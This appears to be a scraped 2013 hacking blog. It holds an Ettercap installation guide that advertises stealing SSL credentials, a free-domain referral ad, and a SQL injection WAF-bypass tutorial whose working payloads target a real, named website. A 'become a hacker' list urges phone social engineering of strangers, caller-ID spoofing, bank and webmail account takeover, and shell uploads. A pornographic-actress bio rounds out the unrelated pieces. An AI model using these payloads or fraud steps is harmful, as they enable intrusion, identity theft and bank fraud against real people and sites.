Monday, 22 April 2013

ettercap-english-1
Ettercap is by far one of the most powerful Security Tools to perform Communication Interception on both Local and Wireless Networks.
A few days ago, Version 0.7.5 was released, introducing three new and exciting features:
1. SSL Password Interception. Captures user credentials from secure web portals such as Facebook, Yahoo, Hotmail and Gmail. This technique is based on the "Sslstrip" tool.
2. IPv6 Support. With this feature, we can now perform security tests over this network generation, giving us new and exciting Ethical Hacking opportunities.
3. NBNS Spoofing. Steals the identitiy of any network device or service, as long as it is based on Netbios name resolution. This attack is very useful on Windows Networks and Samba servers. It can also be used to attack other technologies such as SAN and NAS.
As Security Experts, we need to stay at the cutting edge of our field, testing new attack tools and their capabilities as soon as they become available.
Unfortunately, Ettercap's installation procedure is very poorly documented. Despite my amazing Google Powers, I have not found any useful Internet tutorial. To make things worse, even the great BackTrack distribution does not include the new version.
Furthermore, I really doubt we'll see the new version on Ubuntu's software repositories any time soon. Ettercap authors strongly recommend using "development" libraries, which are considered "unstable" for most production environments.
To solve the conundrum, I decided to write this tutorial, explaining a detailed installation procedure for Ettercap on Ubuntu 12.04. Of course, a rookie Hacker might say "I'll just install it on Windows! Problem solved!".
Well, if you are one of these rookies, I have bad news for you. Installing it on Windows is extremely easy. However, this platform does not support the new SSL attack!
So, with this Tutorial, I'm going to help you become one of the first Ethical Hackers in the whole Universe with the knowledge and power to use the new Ettercap awesome features.
INSTALLATION PROCEDURE
1. Installing Dependencies
. Ettercap requires a lot of software libraries not usually available on a standard Ubuntu system. To install them, just open a terminal and run the following commands:
apt-get install -y cmake cmake-curses-gui
apt-get install -y libgtk2.0-dev libnet1-dev flex build-essential
apt-get install -y linux-headers-`uname -r` libpcre3-dev libpcap0.8-dev openssl
apt-get install -y libssl-dev ncurses-bin libncurses5-dev libnet6-1.3-dev libpthread-stubs0-dev
apt-get install -y zlib1g-dev libltdl-dev pango-graphite pkg-config libpango1.0-dev
apt-get install -y libatk1.0-dev libgtk2.0-dev autoconf byacc
(To accelerate the installation, open this tutorial in your browser and just copy-paste the instructions on your terminal, instead of entering them manually).
2. Sslstrip support. This new feature requires a recent libcurl library version, not yet available in Ubuntu's repositories. So, we need to install it from source. Run the following commands:
cd /usr/src
wget http://curl.haxx.se/download/curl-7.28.0.tar.gz
tar xvfz curl-7.28.0.tar.gz
cd curl-7.28.0
./configure
make
make install
In this tutorial, I'm using /usr/src as destination folder, feel free to use whatever you want.
To make sure Ettercap finds the new library, open the /etc/ld.so.conf file. Add /usr/local/lib at the end. Save the file and run ldconfig to complete the installation.
2. IPv6 Support. This new feature requires a recent libnet library version, not yet available in Ubuntu's repositories. Again, we are going to install it from source. Go to http://sourceforge.net/projects/libnet-dev/ and download the libnet-1.1.6.tar.gz file to any folder. In this tutorial, I'm using /usr/src
Run the following commands from your terminal:
cd /usr/src
tar xvfz libnet-1.1.6.tar.gz
cd libnet-1.1.6
./configure
make
make install
ldconfig
3. Ettercap Installation. Open http://sourceforge.net/projects/ettercap in your browser. Download ettercap-0-7.5.tar.gz to any folder.
In this tutorial, I use /hack/network/mitm (I install all my "Man in The Middle" attack tools in this folder, hence the name. Of course, you can choose any other folder).
Run the following commands in your terminal:
cd /hack/network/mitm
tar xvfz ettercap-0.7.5.tar.gz
cd ettercap-0.7.5
mkdir build
cd build
cmake ..
ccmake ..
You'll see the following screen:
ettercap-english-2
Change the following fields, with the indicated values:
ENABLE_IPV6 ON
FOUND_LIBCURL /usr/local/lib/libcurl.so
HAVE_LIBNET /usr/local/lib/libnet.so
Press Enter after modifying each field, press "c" to return to configuration mode, and finally "g" to save the changes and exit. Finish Ettercap's installation by running the following commands:
make
make install
SSLSTRIP CONFIGURATION
1. Sslstrip capability requires root privileges to make some temporal changes to the local firewall. To grant them, open Ettercap's configuration file /etc/ettercap/etter.conf. Modify the text at line 17, so it reads ec_uid = 0.
ettercap-english-3
2. Delete the # comment character from lines 171 and 172. These are firewall modifications required by Sslstrip, used only while Ettercap is running. Don't worry, they are just network traffic redirection instructions and do not jeopardize your firewall integrity in any way.
ettercap-english-4
Save the etter.conf file.
ETTERCAP TESTING
Run the following command:
ettercap -G
If everything works as expected, you'll see the following screen:
ettercap-english-5
Congratulations! You are now one of the first and proud Ethical Hackers in the whole Universe to test the new and powerful Ettercap!
Now go have a drink... You know you deserve it.

Thursday, 4 April 2013

Itz COST Free but not EFFORT Free ;)
Now u can get your free domain name at
www.freedomainfactory.com
OR
www.freepremiumdomain.com

All u have to do is Sign Up....invite your friends thru your referal link and complete surveys to earn points..DATZ IT!!

Wednesday, 3 April 2013

Common Problem
(Still No Error in order by 10000--)

First thing you do when a website is vulnerable to SQL injection is to check
the number of columns inside the database.
Already tried to put 10000 columns test but still got no errors?
Having problems knowing the number of columns inside the database?
The reason is it is blocked by the WAF, but here is a method to bypass it.

Example Vuln:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10'

Example:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10+order+by+10000--

If there is no error with that number of columns, it will be impossible for a small site like this. :)
To bypass this, you have to add ' after parameter id and also put + at the end.

So you will have something like this.. :)
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10%27+order+by+10000--+

NOTE
YOU STILL HAVE TO CONTINUE USING THE ' AND + AS YOU CONTINUE LIKE THIS.
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10' union select 1,2,3,4,5,6,7,8,9,10,11,12--+

HOPE YOU ENJOY THE TUTORIAL!

How to Become a Hacker:




1. Learn TCP/IP, Basic
Information gathering,
Proxies, Socks, SSL, VPN, VPS,
RDP, FTP, POP3, SMTP, Telnet,
SSH. 2. Learn Linux, Unix, Windows
- You can do this using
vmware or any virtual
desktop utility. 3. Learn a programming
language that's compatible
with all OS - Perl, Python, C . 4. Learn HTML, PHP, Javascript,
ASP, XML, SQL, XSS, SQLI, RFI,
LFI 5. Learn Reverse engineering
and crack some programs for
serials easy ones like mirc,
winzip, winrar or old games. 6. Code a fuzzer for common
protocols - ftp, pop3, 80, 8080 -
Pick some free software like
ftp server, mail server, apache
or iis webserver or a
webserver all-in-one pack, or teamspeak, ventrilo, mumble. 7. Code a tool that uses grep to
sort out unique code in source
codes. 8. Make a custom IPtable, IPsec
firewall that blocks all
incoming traffic and out going
traffic and add filters to accept
certain ports that your
software or scripts use. 9. Pick a kernel in linux or
unix, also pick a Microsoft OS
version lets say Winxp pro sp2
put them on the virtual
desktops (vmware) and find
and code a new local exploit in those versions, then install a
Apache webserver on the
Linux/Unix and a IIS
webserver on the winxp pro
and attempt to find and code a
new local reverse_tcp_shell exploit. 10. Learn Cisco Router and
Switch configuration and
setup. 11. Learn Checkpoint Setup and
Config 12. Learn Wifi scanning,
cracking, sniffing. 13. Pick a person in you
phonebook for the area code
you live in or city then ring
the person on a anonymous
line like skype or a payphone
or a carded sim and attempt to social engineer the person for
his name, address, data of
birth, city born, country born,
ISP connected with, Phone
company connected with,
What bank he/she uses and anything else you can get.
Then Attempt to ring using a
spoof caller ID software with
the person's phone number -
call the ISP and try reset the
password to his/her internet connection/ webmail, get
access to bank account or ask
them to send out a new *** to
a new address (drop) with a
new pin, reset of phone
company passwords. 14. Use your information
gathering skills to get all the
information off a website like
a shop then use the spoof
callerID software or hack your
phone to show a new number of the Webserver's Tech
Support number then ring the
shop owner and try get the
shop site password. 15. Do the same thing but
attempt to use a web attack
against a site or shop to gain
admin access. 16. Once got access upload a
shell and attempt to exploit
the server to gain root using a
exploit you coded not
someone else s exploit. 17. Make your own Linux
Distro 18. Use your own Linux Distro
or use a vanilla Linux gnome
(not kde) keep it with not
much graphics so you can learn
how to depend on the
terminal and start from scratch install applications that you
will only need for a blackbox
(Security test box), make
folders for fuzzers, exploits,
scanners..etc Then load them
up with your own scripts and other tools ( By this stage you
shouldn't need to depend on
other peoples scripts). 19. Learn macosx and attempt
to gain access to a Macosx box
whether it be your own or
someones else s. 20. Create a secure home
network and secure your own
systems with your own
Security policies and firewall
settings. All this isn't a over night
learning it will take a nice 3 - 4
years to learn a bit of this 5+
years to learn most of it and
even then you may need time
to keep learn as IT keeps changing everyday.

Monday, 1 April 2013


Aletta Ocean (born December 14, 1987) is a Hungarian pornographic actress.[1] Ocean began modeling in 2006 after winning a beauty contest. She started pornography in 2007, taking the plunge timidly at first, pushed into it by her boyfriend at the time. Six months later, she had decided to make a job of it. She quit her studies as the news of her professional activity on the side had become known. In 2009 she also spent five months shooting in the USA. She received a nomination in the 11th Hot d'Or, the French pornographic awards, in the category of Best European Starlet.
She has modeled for the likes of Penthouse and Hungarian Playboy. She won the 2010 AVN Awards for Female Foreign Performer of the Year and Best Sex Scene in a Foreign-Shot Production (Dolls House).[2] Ocean has appeared in nearly 180 pornographic films.[3]